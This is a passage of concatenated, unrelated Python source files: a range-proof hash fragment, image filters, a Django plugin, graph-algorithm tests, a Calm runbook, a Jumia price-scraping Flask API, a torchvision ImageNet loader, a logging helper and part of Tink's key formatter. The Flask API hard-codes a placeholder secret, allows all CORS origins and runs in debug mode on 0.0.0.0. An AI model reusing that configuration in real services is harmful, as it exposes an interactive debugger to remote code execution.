for i in range(len(p.L)):
kc.update(p.L[i])
for i in range(len(p.R)):
kc.update(p.R[i])
kc.update(p.a)
kc.update(p.b)
kc.update(p.t)
else:
for r in rv.p.rangeSigs:
for i in range(64):
kc.update(r.asig.s0[i])
for i in range(64):
kc.update(r.asig.s1[i])
kc.update(r.asig.ee)
for i in range(64):
kc.update(r.Ci[i])
c_hash = kc.digest()
kc_master.update(c_hash)
return kc_master.digest()
|
#
# Author: Daniel Dittenhafer
#
# Created: Nov 3, 2016
#
# Description: Image Transformations for faces
#
# An example of each transformation can be found here: https://github.com/dwdii/emotional-faces/tree/master/data/transformed
#
__author__ = 'Daniel Dittenhafer'
import os
import numpy as np
from scipy import misc
from scipy import ndimage
import cv2
def saveImg(destinationPath, prefix, filepath, imgData):
"""Helper function to enable a common way of saving the transformed images."""
fileName = os.path.basename(filepath)
destFile = destinationPath + "\\" + prefix + "-" + fileName
misc.imsave(destFile, imgData)
def reflectY(img):
tx = [[1, 0], [0, -1]]
offset = [0, 350]
img2 = ndimage.interpolation.affine_transform(img, tx, offset)
return img2
def rotate5(img):
img2 = cv2.resize(img, (385, 385), interpolation=cv2.INTER_AREA)
# Rotate
a = 5.0 * np.pi / 180.0
tx = [[np.cos(a),np.sin(a)],[-np.sin(a),np.cos(a)]]
offset = [-10,25] # [right, down] negatives go other direction
img2 = ndimage.interpolation.affine_transform(img2, tx, offset)
# Zoom
img2 = img2[10:360, 10:360]
return img2
def cvErode(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
kernel = np.ones((5, 5), np.uint8)
img_erosion = cv2.erode(img, kernel, iterations=1)
return img_erosion
def cvDilate(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
kernel = np.ones((5, 5), np.uint8)
img_dilation = cv2.dilate(img, kernel, iterations=1)
return img_dilation
def cvDilate2(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
kernel = np.ones((5, 5), np.uint8)
img_dilation = cv2.dilate(img, kernel, iterations=2)
return img_dilation
def cvMedianBlur(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
img2 = cv2.medianBlur(img, 7 )
return img2
def cvExcessiveSharpening(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec22/Sharpening"""
kernel_sharpen_1 = np.array([[1, 1, 1], [1, -7, 1], [1, 1, 1]])
img2 = cv2.filter2D(img, -1, kernel_sharpen_1)
return img2
def cvEdgeEnhancement(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec22/Sharpening"""
kernel_sharpen_3 = np.array([[-1, -1, -1, -1, -1],
[-1, 2, 2, 2, -1],
[-1, 2, 8, 2, -1],
[-1, 2, 2, 2, -1],
[-1, -1, -1, -1, -1]]) / 8.0
img2 = cv2.filter2D(img, -1, kernel_sharpen_3)
return img2
def cvBlurMotion1(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec23/Embossing"""
size = 15
kernel_motion_blur = np.zeros((size, size))
kernel_motion_blur[int((size - 1) / 2), :] = np.ones(size)
kernel_motion_blur = kernel_motion_blur / size
img2 = cv2.filter2D(img, -1, kernel_motion_blur)
return img2
def cvBlurMotion2(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec23/Embossing"""
size = 30
kernel_motion_blur = np.zeros((size, size))
kernel_motion_blur[int((size - 1) / 2), :] = np.ones(size)
kernel_motion_blur = kernel_motion_blur / size
img2 = cv2.filter2D(img, -1, kernel_motion_blur)
return img2 |
from django.utils.translation import ugettext_lazy as _
from fluent_contents.extensions import plugin_pool, ContentPlugin
from .models import ContactPersonItem
@plugin_pool.register
class ContactPersonPlugin(ContentPlugin):
model = ContactPersonItem
raw_id_fields = ('contact', )
render_template = 'icekit/plugins/contact_person/default.html'
category = _('Assets')
|
import unittest
import numpy as np
import torch
from kcd.kcd import KCD
from graphio.graphio import GraphIO
from graphutils.graphutils import GraphUtils
from glob import glob
import os.path
import re
class TestMutliArange(unittest.TestCase):
def test_numpy(self):
print("Testing Multi-arange Function in Numpy ...")
s = np.array([2, 6, 0, 6, 10, 13, 0, 2, 10, 13, 2, 6, 13, 2, 6, 10], dtype=np.uint32)
c = np.array([4, 4, 2, 4, 3, 3, 2, 4, 3, 3, 4, 4, 3, 4, 4, 3], dtype=np.uint32)
e = np.array([2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 6, 7, 8, 9, 10, 11, 12,
13, 14, 15, 0, 1, 2, 3, 4, 5, 10, 11, 12, 13, 14, 15, 2, 3,
4, 5, 6, 7, 8, 9, 13, 14, 15, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12], dtype=np.uint32)
m = GraphUtils.multi_arange_numpy(s, c)
np.testing.assert_array_equal(m, e)
st = torch.from_numpy(s.astype(np.int64))
ct = torch.from_numpy(c.astype(np.int64))
et = torch.from_numpy(e.astype(np.int64))
mt = GraphUtils.multi_arange_torch_ex(st, ct, 'cpu') # mt.data.numpy()
self.assertTrue(torch.all(torch.eq(mt, et)))
class TestIO(unittest.TestCase):
def test_read_txt(self):
print("Testing IO Functions ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
kcd = KCD(ig)
g = GraphIO.reconstruct_original_edge_list(kcd.N, kcd.D, kcd.I)
# Load text file and do pre-processing
arr_txt = np.loadtxt(ig, dtype=kcd.gio.dtype, comments="#")
src, dst = GraphIO.remove_self_loops(arr_txt[:, 0], arr_txt[:, 1])
src, dst = GraphIO.directed_to_undirected(src, dst)
sort_perm = np.lexsort((dst, src))
src = src[sort_perm]
dst = dst[sort_perm]
el = GraphIO.merge(src, dst)
self.assertEqual(g.dtype, el.dtype)
np.testing.assert_array_equal(g, el)
def test_serialize(self):
print("Testing Serialization ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
base_path, ext = os.path.splitext(ig)
kcd_txt = KCD(ig,
skip_prepare=False,
mode="numpy",
serialize="h5",
serialize_prepared=False)
kcd_h5 = KCD(base_path + ".h5",
skip_prepare=False,
mode="numpy",
serialize="mtx",
serialize_prepared=False)
kcd_mtx = KCD(base_path + ".mtx",
skip_prepare=False,
mode="numpy",
serialize="npz",
serialize_prepared=False)
kcd_npz = KCD(base_path + ".npz",
skip_prepare=False,
mode="numpy",
serialize="none",
serialize_prepared=False)
g_txt = GraphIO.reconstruct_original_edge_list(kcd_txt.N, kcd_txt.D, kcd_txt.I)
g_h5 = GraphIO.reconstruct_original_edge_list(kcd_h5.N, kcd_h5.D, kcd_h5.I)
g_mtx = GraphIO.reconstruct_original_edge_list(kcd_mtx.N, kcd_mtx.D, kcd_mtx.I)
g_npz = GraphIO.reconstruct_original_edge_list(kcd_npz.N, kcd_npz.D, kcd_npz.I)
np.testing.assert_array_equal(g_txt, g_h5)
np.testing.assert_array_equal(g_txt, g_mtx)
np.testing.assert_array_equal(g_txt, g_npz)
class TestKCDAlgorithms(unittest.TestCase):
def test_original_numpy_algorithms(self):
print("Testing KCD on Numpy Platform ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
kcd = KCD(ig, mode="numpy")
kcd.run()
# Load output
og = re.sub("sample_input", "expected_output_kcore", ig)
arr_txt = np.loadtxt(og, dtype=kcd.gio.dtype, comments="#")
self.assertEqual(kcd.K.dtype, arr_txt.dtype)
np.testing.assert_array_equal(kcd.K, arr_txt[:, 1])
def test_original_torch_algorithms(self):
print("Testing KCD on Torch platform ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
kcd = KCD(ig, mode="torch-cpu")
kcd.run()
# Load output
og = re.sub("sample_input", "expected_output_kcore", ig)
arr_txt = np.loadtxt(og, dtype=kcd.gio.dtype, comments="#")
self.assertEqual(kcd.K.dtype, arr_txt.dtype)
np.testing.assert_array_equal(kcd.K, arr_txt[:, 1])
if __name__ == '__main__':
unittest.main()
|
"""
Calm Runbook Sample for set variable task
"""
import os
from calm.dsl.runbooks import runbook, ref
from calm.dsl.runbooks import RunbookTask as Task
from calm.dsl.runbooks import CalmEndpoint as Endpoint
@runbook
def DslSetVariableRunbook():
"Runbook example with Set Variable Tasks"
Task.SetVariable.escript(name="Task1", filename=os.path.join("scripts", "set_variable_task1_script.py"), variables=["var1"])
Task.SetVariable.ssh(
name="Task2", filename=os.path.join("scripts", "set_variable_task2_script.sh"), variables=["var2"], target=ref(Endpoint.use_existing("linux_bedag"))
)
Task.Exec.escript(name="Task3", script="print '@@{var1}@@ @@{var2}@@'")
|
# coding: utf-8
# main.py the api core
# Created by S4n1x-d4rk3r
from bs4 import BeautifulSoup
from flask import Flask, jsonify, request
import requests, sqlite3
from hashlib import md5
from datetime import datetime
import time
conn = sqlite3.connect('./flashit.db')
c = conn.cursor()
c.execute('create table if not exists ping (code string, percent string, price string, search string, _date string, not_contain string, must_contain string, category string)')
conn.commit()
c.close()
app = Flask(__name__)
app.config['Secret'] = "Secret"
def getElts(html):
#r = requests.get("http://" +url)
data = html.text
soup = BeautifulSoup(data, features="lxml")
list_results = soup.find_all("a", {"class": "link"})
return list_results
def only_numbers(string_):
if string_ == None:
return "0"
else:
return ''.join([i for i in string_ if i.isdigit()])
def MD5(block_string):
return md5(block_string.encode()).hexdigest()
@app.route('/', methods=['GET']) # To prevent Cors issues
def index1():
# Sent in GET requests
# Build the response
response = jsonify({ 'status':'success', 'message': 'Welcome to Flash API.' })
# Let's allow all Origin requests
response.headers.add('Access-Control-Allow-Origin', '*') # To prevent Cors issues
return response
@app.route('/flash', methods=['GET']) # To prevent Cors issues
def index2():
# Let's protect the main api from crashing
#try:
print("[+] Fetching results...")
# Sent in GET requests
host = request.args.get('host')
find = str(request.args.get('find')).replace(" ", "+")
try: percent = request.args.get('percent')
except Exception as es: percent = "0"
try: level = int(request.args.get('level'))
except Exception as es: level = 5
try: category = request.args.get('category')
except Exception as es: category = "0"
try: price = request.args.get('price')
except Exception as es: price = "0"
try: job = request.args.get('job')
except Exception as es: job = None
not_contain = request.args.get('not_contain').split(",")
must_contain = request.args.get('must_contain').split(",")
print("[+] not_contain: ", not_contain)
print("[+] must_contain: ", must_contain)
code = ""
results_size = 0
json_results = []
percent_classes = ["sale-flag-percent"]
price_classes = ["price"]
for i in range(1, level):
time.sleep(1)
search = host+"/catalog/?q="+find+"&page="+str(i)
if category != "0": search = category.replace("https://www.jumia.cm", host+"/")+"&page="+str(i)
print("[+] search: ", search)
results = getElts(requests.get(search))
results_size += len(results)
for result in results:
print("[+] ---------------------------------- ")
print("[+] - Href: "+result["href"])
children = result.findChildren("span" , recursive=True)
for child in children:
try:
# print("[+] result.text: ", result.text)
# print("[+] price: ", price)
# print("[+] percent: ", percent)
# print("[+] child['class'][0]: ", child['class'][0])
# print("[+] percent_classes: ", percent_classes)
# print("[+] child['class'][0] in percent_classes: ", (child["class"][0] in percent_classes))
# print("[+] float(percent): ", float(percent))
# print("[+] child.text: ", child.text)
# print("[+] (only_numbers(child.text)): ", (only_numbers(child.text)))
# print("[+] float(only_numbers(child.text)): ", float(only_numbers(child.text)))
# print("[+] any(ext.lower() in result.text.lower() for ext in not_contain): ", any(ext.lower() in result.text.lower() for ext in not_contain))
if (
price == "0" and percent != "0" and
child["class"][0] in percent_classes and
float(percent) <= float(only_numbers(child.text)) and
not any(ext.lower() in result.text.lower() for ext in not_contain) and
any(ext.lower() in result.text.lower() for ext in must_contain)):
json_results.append({
"title": str(result.text),
"href": str(result["href"]),
"percent": float(only_numbers(child.text)),
"price": 0
})
elif(
price != "0" and percent == "0" and
child["class"][0] == "price" and
"-old" not in child["class"] and
not any(ext.lower() in result.text.lower() for ext in not_contain) and
any(ext.lower() in result.text.lower() for ext in must_contain)):
product_price = int(child.findChildren("span" , recursive=True)[0]["data-price"])
if (
child["class"][0] in price_classes and
float(price.split("-")[1]) > float(product_price)):
json_results.append({
"title": str(result.text),
"href": str(result["href"]),
"percent": 0,
"price": product_price
})
elif(price == "0" and percent == "0" and
not any(ext.lower() in result.text.lower() for ext in not_contain) and
any(ext.lower() in result.text.lower() for ext in must_contain)):
json_results.append({
"title": str(result.text),
"href": str(result["href"]),
"percent": 0,
"price": int(child.findChildren("span" , recursive=True)[0]["data-price"])
})
except Exception as es: pass
i = i + 1
json_results = sorted(json_results, key=lambda k: k['price'])[::-1]
if price == "0": json_results = sorted(json_results, key=lambda k: k['percent'])[::-1]
if (len(json_results) == 0 and job == None):
must_contain = ','.join(must_contain)
not_contain = ','.join(not_contain)
code = str(MD5(search))[:10]
_date = (str(datetime.now())).split('.')[0]
print("[+] > code:{}, percent:{}, search:{}, date:{}, not_contain:{}, must_contain:{}, category:{}".format(code, percent, search.split("&")[0], _date, not_contain, must_contain, category))
conn = sqlite3.connect('./flashit.db')
c = conn.cursor()
c.execute('INSERT INTO ping VALUES (?,?,?,?,?,?,?,?)', (code, percent, price, search.split("&")[0], _date, not_contain, must_contain, category))
conn.commit()
c.close()
# Build the response
response = jsonify({'status':'success', 'code':code, 'fetched': str(results_size)+' fetched', 'filtered': str(len(json_results))+' filtered', "results": json_results })
# except Exception as es:
# print("[+] Oups, some error occurs!", str(es))
# response = jsonify({'status':'error', 'message':"Your request cause an unexcepted error on the server"})
# Let's allow all Origin requests
response.headers.add('Access-Control-Allow-Origin', '*') # To prevent Cors issues
return response
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True, port=7777) |
import io
import pathlib
import re
from typing import Any, Callable, Dict, List, Optional, Tuple, cast
import torch
from torchdata.datapipes.iter import IterDataPipe, LineReader, IterKeyZipper, Mapper, TarArchiveReader, Filter, Shuffler
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
OnlineResource,
ManualDownloadResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import (
INFINITE_BUFFER_SIZE,
BUILTIN_DIR,
path_comparator,
Enumerator,
getitem,
read_mat,
)
from torchvision.prototype.features import Label, DEFAULT
from torchvision.prototype.utils._internal import FrozenMapping
class ImageNetResource(ManualDownloadResource):
def __init__(self, **kwargs: Any) -> None:
super().__init__("Register on https://image-net.org/ and follow the instructions there.", **kwargs)
class ImageNetLabel(Label):
wnid: Optional[str]
@classmethod
def _parse_meta_data(
cls,
category: Optional[str] = DEFAULT, # type: ignore[assignment]
wnid: Optional[str] = DEFAULT, # type: ignore[assignment]
) -> Dict[str, Tuple[Any, Any]]:
return dict(category=(category, None), wnid=(wnid, None))
class ImageNet(Dataset):
def _make_info(self) -> DatasetInfo:
name = "imagenet"
categories, wnids = zip(*DatasetInfo.read_categories_file(BUILTIN_DIR / f"{name}.categories"))
return DatasetInfo(
name,
type=DatasetType.IMAGE,
dependencies=("scipy",),
categories=categories,
homepage="https://www.image-net.org/",
valid_options=dict(split=("train", "val", "test")),
extra=dict(
wnid_to_category=FrozenMapping(zip(wnids, categories)),
category_to_wnid=FrozenMapping(zip(categories, wnids)),
sizes=FrozenMapping(
[
(DatasetConfig(split="train"), 1_281_167),
(DatasetConfig(split="val"), 50_000),
(DatasetConfig(split="test"), 100_000),
]
),
),
)
def supports_sharded(self) -> bool:
return True
@property
def category_to_wnid(self) -> Dict[str, str]:
return cast(Dict[str, str], self.info.extra.category_to_wnid)
@property
def wnid_to_category(self) -> Dict[str, str]:
return cast(Dict[str, str], self.info.extra.wnid_to_category)
_IMAGES_CHECKSUMS = {
"train": "b08200a27a8e34218a0e58fde36b0fe8f73bc377f4acea2d91602057c3ca45bb",
"val": "c7e06a6c0baccf06d8dbeb6577d71efff84673a5dbdd50633ab44f8ea0456ae0",
"test_v10102019": "9cf7f8249639510f17d3d8a0deb47cd22a435886ba8e29e2b3223e65a4079eb4",
}
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
name = "test_v10102019" if config.split == "test" else config.split
images = ImageNetResource(file_name=f"ILSVRC2012_img_{name}.tar", sha256=self._IMAGES_CHECKSUMS[name])
devkit = ImageNetResource(
file_name="ILSVRC2012_devkit_t12.tar.gz",
sha256="b59243268c0d266621fd587d2018f69e906fb22875aca0e295b48cafaa927953",
)
return [images, devkit]
_TRAIN_IMAGE_NAME_PATTERN = re.compile(r"(?P<wnid>n\d{8})_\d+[.]JPEG")
def _collate_train_data(self, data: Tuple[str, io.IOBase]) -> Tuple[ImageNetLabel, Tuple[str, io.IOBase]]:
path = pathlib.Path(data[0])
wnid = self._TRAIN_IMAGE_NAME_PATTERN.match(path.name).group("wnid") # type: ignore[union-attr]
category = self.wnid_to_category[wnid]
label = ImageNetLabel(self.categories.index(category), category=category, wnid=wnid)
return label, data
_VAL_TEST_IMAGE_NAME_PATTERN = re.compile(r"ILSVRC2012_(val|test)_(?P<id>\d{8})[.]JPEG")
def _val_test_image_key(self, data: Tuple[str, Any]) -> int:
path = pathlib.Path(data[0])
return int(self._VAL_TEST_IMAGE_NAME_PATTERN.match(path.name).group("id")) # type: ignore[union-attr]
def _collate_val_data(
self, data: Tuple[Tuple[int, int], Tuple[str, io.IOBase]]
) -> Tuple[ImageNetLabel, Tuple[str, io.IOBase]]:
label_data, image_data = data
_, label = label_data
category = self.categories[label]
wnid = self.category_to_wnid[category]
return ImageNetLabel(label, category=category, wnid=wnid), image_data
def _collate_test_data(self, data: Tuple[str, io.IOBase]) -> Tuple[None, Tuple[str, io.IOBase]]:
return None, data
def _collate_and_decode_sample(
self,
data: Tuple[Optional[ImageNetLabel], Tuple[str, io.IOBase]],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
label, (path, buffer) = data
return dict(
path=path,
image=decoder(buffer) if decoder else buffer,
label=label,
)
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
images_dp, devkit_dp = resource_dps
if config.split == "train":
# the train archive is a tar of tars
dp = TarArchiveReader(images_dp)
dp = Shuffler(dp, buffer_size=INFINITE_BUFFER_SIZE)
dp = Mapper(dp, self._collate_train_data)
elif config.split == "val":
devkit_dp = Filter(devkit_dp, path_comparator("name", "ILSVRC2012_validation_ground_truth.txt"))
devkit_dp = LineReader(devkit_dp, return_path=False)
devkit_dp = Mapper(devkit_dp, int)
devkit_dp = Enumerator(devkit_dp, 1)
devkit_dp = Shuffler(devkit_dp, buffer_size=INFINITE_BUFFER_SIZE)
dp = IterKeyZipper(
devkit_dp,
images_dp,
key_fn=getitem(0),
ref_key_fn=self._val_test_image_key,
buffer_size=INFINITE_BUFFER_SIZE,
)
dp = Mapper(dp, self._collate_val_data)
else: # config.split == "test"
dp = Shuffler(images_dp, buffer_size=INFINITE_BUFFER_SIZE)
dp = Mapper(dp, self._collate_test_data)
return Mapper(dp, self._collate_and_decode_sample, fn_kwargs=dict(decoder=decoder))
# Although the WordNet IDs (wnids) are unique, the corresponding categories are not. For example, both n02012849
# and n03126707 are labeled 'crane' while the first means the bird and the latter means the construction equipment
_WNID_MAP = {
"n03126707": "construction crane",
"n03710721": "tank suit",
}
def _generate_categories(self, root: pathlib.Path) -> List[Tuple[str, ...]]:
resources = self.resources(self.default_config)
devkit_dp = resources[1].load(root / self.name)
devkit_dp = Filter(devkit_dp, path_comparator("name", "meta.mat"))
meta = next(iter(devkit_dp))[1]
synsets = read_mat(meta, squeeze_me=True)["synsets"]
categories_and_wnids = cast(
List[Tuple[str, ...]],
[
(self._WNID_MAP.get(wnid, category.split(",", 1)[0]), wnid)
for _, wnid, category, _, num_children, *_ in synsets
# if num_children > 0, we are looking at a superclass that has no direct instance
if num_children == 0
],
)
categories_and_wnids.sort(key=lambda category_and_wnid: category_and_wnid[1])
return categories_and_wnids
|
#!/usr/bin/env python3
class LogStats():
def __init__(self):
self.reset()
def reset(self):
self.data_accum = []
self.data_averages = []
def log_data(self, data):
self.data_accum.append(data)
def log_average(self):
total = 0
for l in self.data_accum:
total += l
length = len(self.data_accum)
self.data_accum = []
self.data_averages.append(total / length)
def get_averages(self):
return self.data_averages
def test_log_stats():
log_stats = LogStats()
log_stats.log_data(1)
log_stats.log_data(2)
log_stats.log_data(3)
log_stats.log_average()
log_stats.log_data(2)
log_stats.log_data(3)
log_stats.log_data(4)
log_stats.log_average()
averages = log_stats.get_averages()
assert averages[0] == 2,"Incorrect average calculated!"
assert averages[1] == 3,"Incorrect average calculated!"
if __name__ == "__main__":
test_log_stats() |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Custom Text-format functions for Tink Keys, Keysets and Key Templates.
Tink keys contain a serialized proto. Because we don't use any proto, the
text output of the proto library is not helpful. The function
key_util.text_format(msg: message.Message)
is similar to text_format.MessageToString(msg), but additionally output the
parsed serialized proto as a comment, which makes the proto human readable,
but keep them readable by machines. For example, the AES128_EAX template
looks like this:
type_url: "type.googleapis.com/google.crypto.tink.AesEaxKey"
# value: [type.googleapis.com/google.crypto.tink.AesEaxKeyFormat] {
# params {
# iv_size: 16
# }
# key_size: 16
# }
value: "\n\002\010\020\020\020"
output_prefix_type: TINK
The function
assert_tink_proto_equal(self, a: message.Message, b: message.Message)
can be used in tests to assert that two protos must be equal. If they are
not equal, the function tries to output a meaningfull error message.
"""
from typing import Any, Optional
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import text_encoding
from tink.proto import aes_cmac_pb2
from tink.proto import aes_cmac_prf_pb2
from tink.proto import aes_ctr_hmac_aead_pb2
from tink.proto import aes_ctr_hmac_streaming_pb2
from tink.proto import aes_eax_pb2
from tink.proto import aes_gcm_hkdf_streaming_pb2
from tink.proto import aes_gcm_pb2
from tink.proto import aes_gcm_siv_pb2
from tink.proto import aes_siv_pb2
from tink.proto import chacha20_poly1305_pb2
from tink.proto import ecdsa_pb2
from tink.proto import ecies_aead_hkdf_pb2
from tink.proto import ed25519_pb2
from tink.proto import hkdf_prf_pb2
from tink.proto import hmac_pb2
from tink.proto import hmac_prf_pb2
from tink.proto import jwt_ecdsa_pb2
from tink.proto import jwt_hmac_pb2
from tink.proto import jwt_rsa_ssa_pkcs1_pb2
from tink.proto import jwt_rsa_ssa_pss_pb2
from tink.proto import kms_aead_pb2
from tink.proto import kms_envelope_pb2
from tink.proto import rsa_ssa_pkcs1_pb2
from tink.proto import rsa_ssa_pss_pb2
from tink.proto import xchacha20_poly1305_pb2
TYPE_STRING = 9
TYPE_MESSAGE = 11
TYPE_BYTES = 12
TYPE_ENUM = 14
LABEL_REPEATED = 3
TYPE_PREFIX = 'type.googleapis.com/'
class KeyProto:
"""A map from type URLs to key protos and key format protos."""
_from_url = {}
_format_from_url = {}
@classmethod
def from_url(cls, type_url: str) -> Any:
return cls._from_url[type_url]
@classmethod
def format_from_url(cls, type_url: str) -> Any:
return cls._format_from_url[type_url]
@classmethod
def add_key_type(cls, key_type: Any, key_format_type: Any):
type_url = TYPE_PREFIX + key_type.DESCRIPTOR.full_name
cls._from_url[type_url] = key_type
cls._format_from_url[type_url] = key_format_type
KeyProto.add_key_type(aes_eax_pb2.AesEaxKey, aes_eax_pb2.AesEaxKeyFormat)
KeyProto.add_key_type(aes_gcm_pb2.AesGcmKey, aes_gcm_pb2.AesGcmKeyFormat)
KeyProto.add_key_type(aes_gcm_siv_pb2.AesGcmSivKey,
aes_gcm_siv_pb2.AesGcmSivKeyFormat)
KeyProto.add_key_type(aes_ctr_hmac_aead_pb2.AesCtrHmacAeadKey,
aes_ctr_hmac_aead_pb2.AesCtrHmacAeadKeyFormat)
KeyProto.add_key_type(chacha20_poly1305_pb2.ChaCha20Poly1305Key,
chacha20_poly1305_pb2.ChaCha20Poly1305KeyFormat)
KeyProto.add_key_type(xchacha20_poly1305_pb2.XChaCha20Poly1305Key,
xchacha20_poly1305_pb2.XChaCha20Poly1305KeyFormat)
KeyProto.add_key_type(aes_siv_pb2.AesSivKey, aes_siv_pb2.AesSivKeyFormat)
KeyProto.add_key_type(aes_ctr_hmac_streaming_pb2.AesCtrHmacStreamingKey,
aes_ctr_hmac_streaming_pb2.AesCtrHmacStreamingKeyFormat)
KeyProto.add_key_type(aes_gcm_hkdf_streaming_pb2.AesGcmHkdfStreamingKey,
aes_gcm_hkdf_streaming_pb2.AesGcmHkdfStreamingKeyFormat)
KeyProto.add_key_type(ecies_aead_hkdf_pb2.EciesAeadHkdfPrivateKey,
ecies_aead_hkdf_pb2.EciesAeadHkdfKeyFormat)
KeyProto.add_key_type(ecies_aead_hkdf_pb2.EciesAeadHkdfPublicKey,
ecies_aead_hkdf_pb2.EciesAeadHkdfKeyFormat)
KeyProto.add_key_type(aes_cmac_pb2.AesCmacKey, aes_cmac_pb2.AesCmacKeyFormat)
KeyProto.add_key_type(hmac_pb2.HmacKey, hmac_pb2.HmacKeyFormat)
KeyProto.add_key_type(ecdsa_pb2.EcdsaPrivateKey, ecdsa_pb2.EcdsaKeyFormat)
KeyProto.add_key_type(ecdsa_pb2.EcdsaPublicKey, ecdsa_pb2.EcdsaKeyFormat)
KeyProto.add_key_type(ed25519_pb2.Ed25519PrivateKey,
ed25519_pb2.Ed25519KeyFormat)
KeyProto.add_key_type(ed25519_pb2.Ed25519PublicKey,
ed25519_pb2.Ed25519KeyFormat)
KeyProto.add_key_type(rsa_ssa_pkcs1_pb2.RsaSsaPkcs1PrivateKey,
rsa_ssa_pkcs1_pb2.RsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(rsa_ssa_pkcs1_pb2.RsaSsaPkcs1PublicKey,
rsa_ssa_pkcs1_pb2.RsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(rsa_ssa_pss_pb2.RsaSsaPssPrivateKey,
rsa_ssa_pss_pb2.RsaSsaPssKeyFormat)
KeyProto.add_key_type(rsa_ssa_pss_pb2.RsaSsaPssPublicKey,
rsa_ssa_pss_pb2.RsaSsaPssKeyFormat)
KeyProto.add_key_type(aes_cmac_prf_pb2.AesCmacPrfKey,
aes_cmac_prf_pb2.AesCmacPrfKeyFormat)
KeyProto.add_key_type(hmac_prf_pb2.HmacPrfKey, hmac_prf_pb2.HmacPrfKeyFormat)
KeyProto.add_key_type(hkdf_prf_pb2.HkdfPrfKey, hkdf_prf_pb2.HkdfPrfKeyFormat)
KeyProto.add_key_type(jwt_ecdsa_pb2.JwtEcdsaPrivateKey,
jwt_ecdsa_pb2.JwtEcdsaKeyFormat)
KeyProto.add_key_type(jwt_ecdsa_pb2.JwtEcdsaPublicKey,
jwt_ecdsa_pb2.JwtEcdsaKeyFormat)
KeyProto.add_key_type(jwt_hmac_pb2.JwtHmacKey, jwt_hmac_pb2.JwtHmacKeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1PrivateKey,
jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1PublicKey,
jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssPrivateKey,
jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssKeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssPublicKey,
jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssKeyFormat)
KeyProto.add_key_type(kms_aead_pb2.KmsAeadKey, kms_aead_pb2.KmsAeadKeyFormat)
KeyProto.add_key_type(kms_envelope_pb2.KmsEnvelopeAeadKey,
kms_envelope_pb2.KmsEnvelopeAeadKeyFormat)
def _text_format_field(value: Any,
field: descriptor.FieldDescriptor,
indent: str, remove_value: bool) -> str:
"""Returns a text formated proto field."""
if field.type == TYPE_MESSAGE:
output = [
indent + field.name + ' {',
_text_format_message(value, indent + ' ', remove_value), indent + '}'
]
return '\n'.join(output)
elif field.type == TYPE_ENUM:
value_name = field.enum_type.values_by_number[value].name
return indent + field.name + ': ' + value_name
elif field.type in [TYPE_STRING, TYPE_BYTES]:
return (indent + field.name + ': "' + text_encoding.CEscape(value, False) +
'"')
else:
return indent + field.name + ': ' + str(value)
def _text_format_message(msg: message.Message, indent: str,
remove_value: bool) -> str:
"""Returns a text formated proto message.
Args:
msg: the proto to be formated.
indent: the indentation prefix of each line in the output.
remove_value: if True, replaced the value fields of tink's custom any protos
with '<removed>'. This is useful to compare protos, but should not be
used otherwise.
Returns:
A proto text format output, where serialized fields are deserialized in
a comment.
"""
output = []
fields = msg.DESCRIPTOR.fields
if (len(fields) >= 2 and fields[0].name == 'type_url' and
fields[1].name == 'value'):
# special case for custom 'any' proto.
if getattr(msg, 'type_url'):
type_url = getattr(msg, 'type_url')
output.append(
_text_format_field(type_url, fields[0], indent, remove_value))
if getattr(msg, 'value'):
value = getattr(msg, 'value')
if msg.DESCRIPTOR.full_name == 'google.crypto.tink.KeyTemplate':
# In KeyTemplates, type_url does not match the proto type used.
proto_type = KeyProto.format_from_url(type_url)
else:
proto_type = KeyProto.from_url(type_url)
# parse 'value' and text format the content in a comment.
field_proto = proto_type.FromString(value)
output.append(indent + '# value: [' + TYPE_PREFIX +
proto_type.DESCRIPTOR.full_name + '] {')
output.append(
_text_format_message(field_proto, indent + '# ', remove_value))
output.append(indent + '# }')
